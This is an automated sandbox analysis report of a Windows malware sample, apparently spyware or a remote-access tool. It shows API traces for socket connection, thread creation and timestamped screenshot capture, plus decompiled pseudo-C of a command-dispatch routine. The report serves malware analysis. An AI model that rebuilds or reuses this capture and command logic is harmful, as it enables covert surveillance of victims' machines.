                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                          • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                          • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                          • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                          • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                          • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                          • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                          • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                          • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,0041B310,?,0041B310,0041C0C8,0041B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                          • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$Create$D@1@@$?size@?$basic_string@G@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@Stream_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                        • String ID: image/jpeg
                                        • API String ID: 1042780377-3785015651
                                        • Opcode ID: b0730c79e71e437cfddf2c56560b672f6144d9d155c94930c0d9f44daa166224
                                        • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                        • Opcode Fuzzy Hash: b0730c79e71e437cfddf2c56560b672f6144d9d155c94930c0d9f44daa166224
                                        • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410B1B, Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 187sleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _EH_prolog.MSVCRT ref: 00410B20
                                        • GdiplusStartup.GDIPLUS(0041BF18,?,00000000,00000000,00000000,00000000), ref: 00410B59
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410B79
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410B85
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000001A), ref: 00410BAA
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 00410BBC
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410BDC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BE8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BF4
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00410BFD
                                        • CreateDirectoryW.KERNEL32(00000000), ref: 00410C04
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C17
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C2A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00415898), ref: 00410C89
                                        • Sleep.KERNEL32(000003E8), ref: 00410CA6
                                        • GetLocalTime.KERNEL32(?), ref: 00410CB1
                                        • swprintf.MSVCRT(?,00416AC0,?,?,?,?,?,?), ref: 00410CF4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,?,00415898), ref: 00410D1A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415898), ref: 00410D2A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,00415898), ref: 00410D3A
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00415898), ref: 00410D49
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D55
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D61
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D6D
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,00415898), ref: 00410D7D
                                          • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                          • Part of subcall function 0041093F: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                          • Part of subcall function 0041093F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                          • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                          • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                          • Part of subcall function 0041093F: SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                          • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                          • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                          • Part of subcall function 0041093F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                          • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                          • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                          • Part of subcall function 0041093F: DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                          • Part of subcall function 0041093F: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                          • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                          • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                          • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                          • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015,?,?,?,?,?,?,?,00415898), ref: 00410D9B
                                        • atoi.MSVCRT ref: 00410DA2
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00415898), ref: 00410DB0
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,00415898), ref: 00410DC9
                                        • atoi.MSVCRT ref: 00410DD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$G@1@@G@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?data@?$basic_string@V01@$?size@?$basic_string@CreateSleepatoi$?length@?$basic_string@D@1@@DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimeswprintf
                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                        • API String ID: 2994672083-3790400642
                                        • Opcode ID: 7a11f7ef75dea44434b4bed565def541b1dad23d80d8a0557a62dd92252c596e
                                        • Instruction ID: 09d63aef6d3d8e876cb0f678efb75e9f291bc689162efedecff38abdc591dce5
                                        • Opcode Fuzzy Hash: 7a11f7ef75dea44434b4bed565def541b1dad23d80d8a0557a62dd92252c596e
                                        • Instruction Fuzzy Hash: 9C71A37190061DEBCB15ABA0DC8DBEE7778AB84305F1480AAF509A7191EB784AC58F5C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410F04, Relevance: 54.4, APIs: 36, Instructions: 407COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 21%
                                        			E00410F04(intOrPtr* __eax, void* __eflags, char _a8) {
				char _v20;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				char _v104;
				char _v120;
				char _v136;
				char _v152;
				char _v168;
				char _v184;
				char _v200;
				char _v216;
				void* _t69;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t78;
				char* _t83;
				void* _t85;
				void* _t86;
				void* _t88;
				char* _t92;
				void* _t94;
				void* _t95;
				void* _t97;
				char* _t101;
				void* _t103;
				void* _t104;
				void* _t106;
				char* _t110;
				void* _t112;
				char* _t118;
				char* _t119;
				char* _t120;
				intOrPtr* _t123;
				void* _t125;
				void* _t127;
				char* _t130;
				char* _t135;
				char* _t136;
				char* _t137;
				intOrPtr _t139;
				void* _t230;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t241;
				void* _t242;
				void* _t247;
				void* _t248;
				void* _t253;
				void* _t254;
				void* _t264;
				void* _t265;

				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
				_t139 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z( *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_a8, 0x41b310,  &_v40,  &_v40, 1);
				_t233 = _t230 + 0x24;
				_t69 = _t139 - 1;
				if(_t69 == 0) {
					E00412855(_t233 - 0xc, _t233 - 0xc, E004113C9( &_v216));
					E004020C2(0x41c130);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(0x79);
					L26:
					_t74 = E004017DD( &_v20);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t74;
				}
				_t75 = _t69 - 1;
				if(_t75 == 0) {
					_t76 = E004119AD( &_v20, 0);
					_t235 = _t233 - 0x10;
					_push(_t76);
					E00412881(_t76);
					_t78 = E00411700(_t235);
					_t236 = _t235 + 0x10;
					__eflags = _t78;
					if(_t78 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x80);
						L14:
						E004020C2(0x41c130);
						goto L26;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t83 =  &_v184;
					_push(_t83);
					L00414140();
					_push(_t83);
					L00414140();
					E004020C2(0x41c130, 0x7a, _t236 - 0x10);
					L23:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L26;
				}
				_t85 = _t75 - 1;
				if(_t85 == 0) {
					_t86 = E004119AD( &_v20, 0);
					_t241 = _t233 - 0x10;
					_push(_t86);
					E00412881(_t86);
					_t88 = E00411760(_t241);
					_t242 = _t241 + 0x10;
					__eflags = _t88;
					if(_t88 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x81);
						goto L14;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t92 =  &_v152;
					_push(_t92);
					L00414140();
					_push(_t92);
					L00414140();
					E004020C2(0x41c130, 0x7b, _t242 - 0x10);
					goto L23;
				}
				_t94 = _t85 - 1;
				if(_t94 == 0) {
					_t95 = E004119AD( &_v20, 0);
					_t247 = _t233 - 0x10;
					_push(_t95);
					E00412881(_t95);
					_t97 = E00411859(_t247);
					_t248 = _t247 + 0x10;
					__eflags = _t97;
					if(_t97 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x82);
						goto L14;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t101 =  &_v120;
					_push(_t101);
					L00414140();
					_push(_t101);
					L00414140();
					E004020C2(0x41c130, 0x7c, _t248 - 0x10);
					goto L23;
				}
				_t103 = _t94 - 1;
				if(_t103 == 0) {
					_t104 = E004119AD( &_v20, 0);
					_t253 = _t233 - 0x10;
					_push(_t104);
					E00412881(_t104);
					_t106 = E004118C0(_t253);
					_t254 = _t253 + 0x10;
					__eflags = _t106;
					if(_t106 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x83);
						goto L14;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t110 =  &_v88;
					_push(_t110);
					L00414140();
					_push(_t110);
					L00414140();
					E004020C2(0x41c130, 0x7d, _t254 - 0x10);
					goto L23;
				}
				_t112 = _t103 - 1;
				if(_t112 == 0) {
					E00412881(_t113);
					_v24 = E004117C7(_t233 - 0x10);
					_t118 =  &_v72;
					L00414140();
					_t119 =  &_v136;
					L00414140();
					_t120 =  &_v56;
					L00414140();
					L0041417C();
					E004020C2(0x41c130, 0x7f, _t233 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t120, _t120, _t119, _t119, _t118, _t118, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, _v24, E004119AD( &_v20, 0));
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L23;
				}
				if(_t112 != 1) {
					goto L26;
				}
				_t123 = E004119AD( &_v20, 2);
				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
				_push( *_t123);
				_t125 = E004119AD( &_v20, 0);
				_t264 = _t233 - 0x10;
				_push(_t125);
				_push(_t264);
				E00412881(_t125);
				_t127 = E00411927();
				_t265 = _t264 + 0x14;
				if(_t127 == 0) {
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t130 =  &_v104;
					_push(_t130);
					L00414140();
					_push(_t130);
					L00414140();
					E004020C2(0x41c130, 0x84, _t265 - 0x10);
				} else {
					_t135 =  &_v200;
					L00414140();
					_t136 =  &_v168;
					L00414140();
					_t137 =  &_v40;
					L00414140();
					L00414140();
					E004020C2(0x41c130, 0x7e, _t265 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t137, _t137, _t136, _t136, _t135, _t135, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, E004119AD( &_v20, 2));
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				}
				goto L23;
			}



























































                                        0x00410f16
                                        0x00410f1c
                                        0x00410f2e
                                        0x00410f38
                                        0x00410f41
                                        0x00410f52
                                        0x00410f61
                                        0x00410f6b
                                        0x00410f73
                                        0x00410f76
                                        0x00410f77
                                        0x00411394
                                        0x004113a2
                                        0x004113ad
                                        0x004113b3
                                        0x004113b6
                                        0x004113be
                                        0x004113c8
                                        0x004113c8
                                        0x00410f7d
                                        0x00410f7e
                                        0x004112f5
                                        0x004112fa
                                        0x004112ff
                                        0x00411301
                                        0x00411308
                                        0x0041130d
                                        0x00411310
                                        0x00411312
                                        0x00411371
                                        0x00411377
                                        0x004111ce
                                        0x004111d3
                                        0x00000000
                                        0x004111d3
                                        0x00411326
                                        0x00411327
                                        0x0041132e
                                        0x0041132f
                                        0x00411335
                                        0x00411336
                                        0x0041133e
                                        0x00411340
                                        0x0041134f
                                        0x0041135a
                                        0x0041135a
                                        0x00000000
                                        0x0041135a
                                        0x00410f84
                                        0x00410f85
                                        0x00411268
                                        0x0041126d
                                        0x00411272
                                        0x00411274
                                        0x0041127b
                                        0x00411280
                                        0x00411283
                                        0x00411285
                                        0x004112e1
                                        0x004112e7
                                        0x00000000
                                        0x004112e7
                                        0x00411299
                                        0x0041129a
                                        0x004112a1
                                        0x004112a2
                                        0x004112a8
                                        0x004112a9
                                        0x004112b1
                                        0x004112b3
                                        0x004112c2
                                        0x00000000
                                        0x004112c7
                                        0x00410f8b
                                        0x00410f8c
                                        0x004111e1
                                        0x004111e6
                                        0x004111eb
                                        0x004111ed
                                        0x004111f4
                                        0x004111f9
                                        0x004111fc
                                        0x004111fe
                                        0x00411254
                                        0x0041125a
                                        0x00000000
                                        0x0041125a
                                        0x00411212
                                        0x00411213
                                        0x0041121a
                                        0x0041121b
                                        0x0041121e
                                        0x0041121f
                                        0x00411227
                                        0x00411229
                                        0x00411238
                                        0x00000000
                                        0x0041123d
                                        0x00410f92
                                        0x00410f93
                                        0x00411150
                                        0x00411155
                                        0x0041115a
                                        0x0041115c
                                        0x00411163
                                        0x00411168
                                        0x0041116b
                                        0x0041116d
                                        0x004111c3
                                        0x004111c9
                                        0x00000000
                                        0x004111c9
                                        0x00411181
                                        0x00411182
                                        0x00411189
                                        0x0041118a
                                        0x0041118d
                                        0x0041118e
                                        0x00411196
                                        0x00411198
                                        0x004111a7
                                        0x00000000
                                        0x004111ac
                                        0x00410f99
                                        0x00410f9a
                                        0x004110c5
                                        0x004110d1
                                        0x004110f0
                                        0x004110f4
                                        0x004110fd
                                        0x00411104
                                        0x0041110d
                                        0x00411111
                                        0x0041111b
                                        0x0041112a
                                        0x00411132
                                        0x0041113e
                                        0x00000000
                                        0x00411144
                                        0x00410fa1
                                        0x00000000
                                        0x00000000
                                        0x00410fad
                                        0x00410fb4
                                        0x00410fbf
                                        0x00410fc1
                                        0x00410fc6
                                        0x00410fcb
                                        0x00410fcc
                                        0x00410fcd
                                        0x00410fd4
                                        0x00410fd9
                                        0x00410fde
                                        0x0041107f
                                        0x00411080
                                        0x00411087
                                        0x00411088
                                        0x0041108b
                                        0x0041108c
                                        0x00411094
                                        0x00411096
                                        0x004110a8
                                        0x00410fe4
                                        0x0041100b
                                        0x00411012
                                        0x0041101b
                                        0x00411022
                                        0x0041102b
                                        0x0041102f
                                        0x00411039
                                        0x00411048
                                        0x00411050
                                        0x0041105c
                                        0x00411062
                                        0x00000000

                                        APIs
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410F16
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,69D65DF0), ref: 00410F2E
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410F38
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410F41
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00410F52
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410F61
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
